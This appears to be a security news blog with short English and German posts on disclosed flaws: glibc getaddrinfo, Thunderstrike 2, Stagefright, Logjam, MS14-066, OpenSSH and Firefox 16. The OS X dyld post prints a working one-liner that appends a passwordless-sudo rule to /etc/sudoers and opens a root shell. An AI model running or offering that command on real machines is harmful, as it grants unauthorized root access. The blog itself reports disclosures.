Feb 16 18

tuxOh no! google engineers discovered a stack-based buffer overflow vulnerability in the getaddrinfo() library function in the DNS resolver, shipped with glibc versions since 2.9, which may allow a remote attacker to execute arbitrary code.

written by d45id \\ tags: , , , , , ,

Aug 15 03

Kovah, who discovered with his partners a lot of firmware vulnerabilities in Macs  last year has now designed with Trammell Hudson, a security engineer a worm they dubbed Thunderstrike 2 that can spread between MacBooks undetected.

[The attack is] really hard to detect, it’s really hard to get rid of, and it’s really hard to protect against something that’s running inside the firmware

Find out more at BlackHat & DefCon or read an amazing article @wired

written by d45id \\ tags: , , , , , , , ,

Jul 15 28

Full disclosure at BlackHat 2015!

stagefrightStagefright’ it gets the title of ‘Mother of all Android Vulnerabilities’, as it impacts 95% of all Android devices out there and do not require any interaction with the victim.

The cause of the problem appears to be a memory error in the processing of MPEG4 and 3GPP video files.

written by d45id \\ tags: , , , , , ,

Jul 15 23

alertSecurity expert Stefan Esser discovered a privilege escalation vulnerability in OS X 10.10. The vulnerability is found in the dynamic linker dyld.

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

OS X 10.11 pre release candidate is not vulnerable. For all the people who want to fix the problem as soon as possible a patch was published by Esser.

written by d45id \\ tags: , , , , , , , , ,

Mai 15 20

alertCrypto researcher discovered a new ancient bug in Diffie-Hellman crytography. The problem is thatservers that support 512-key “export-grade” Diffie-Hellman (DH) can be forced to downgrade a connection to that weak level. The server – and therefore the client – will both still believe they’re using stronger keys such as 768-bit or 1024-bit.

Matthew Green – one of the researcher – has hosted a site discussing what’s being called „#Logjam„, Weakdh.org, with a detailed paper – Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice (PDF) – that explain the bug in a academic way.

written by d45id \\ tags: , , , , , , , ,

Nov 14 18

remote_code_executionSicherheitsforscher der Firma BeyondTrust haben einen sehr interesanten Artikel publiziert in dem sie Möglichkeiten zur Nutzung der Sicherheitsanfälligkeit – CVE-2014-6321 / MS14-066 – im Microsoft SChannel-Sicherheitspaket (Secure Channel) im Detail aufzeigen, so zum Beispiele eine remote code execution eines Programms, dass den SChannel Security Service Provider verwendet, wie die Microsoft Internet Information Services (IIS).

Weiterführende Informationen
BeyondTrust – Triggering MS14-066

written by d45id \\ tags: , , , , ,

Nov 13 08

puffy-sshWie heute das OpenSSH-Projekt in einem Advisory bekannt gab existiert eine Memory Corruption-Problem, welches im Prinzip zu einer aus der Ferne ausnützbaren Sicherheitslücke führen kann.
Zwar lässt sich diese Lücke anscheinend nur nach erfolgreicher Anmeldung am System ausnutzen, dennoch empfiehlt es sich den angegebenen Workaround zu implementieren bzw. auf die entsprechend gepatchte Version upzugraden.

Noch ist nicht bekannt, dass Exploits die dieses Problem ausnützen können, existieren bzw. in Verwendung sind – da der Quellcode von OpenSSH offen ist, ist jedoch davon auszugehen, dass dies sehr bald der Fall sein wird. Continue reading »

written by d45id \\ tags: , , ,

Okt 12 12

Es dauerte gerade einmal einen Tag ab Release 16.0 des beliebten Browsers Firefox bis auch schon die erste (kritische)  Sicherheitslücke entdeckt wurde.
Die Schwachstelle erlaubt es einer (ggf. bösartigen) Webseite Einsicht in die Surf-Chronik von Nutzern zu nehmen und dadurch die besuchten URLs auszulesen.

Zwar gab es zum Zeitpunkt der Entdeckung noch kein Exploit in freier Wildbahn, jedoch ließen die ersten Tests in diese Richtung nicht lange auf sich warten.

Mitlerweile (nach nur zwei Tagen seit Entdeckung der Schwachstelle) hat Mozilla das Problem – und zwei weitere gleich mit – auch schon behoben und Firefox in der Version 16.0.1 veröffentlicht.

 

written by d45id \\ tags: , , , , , , , ,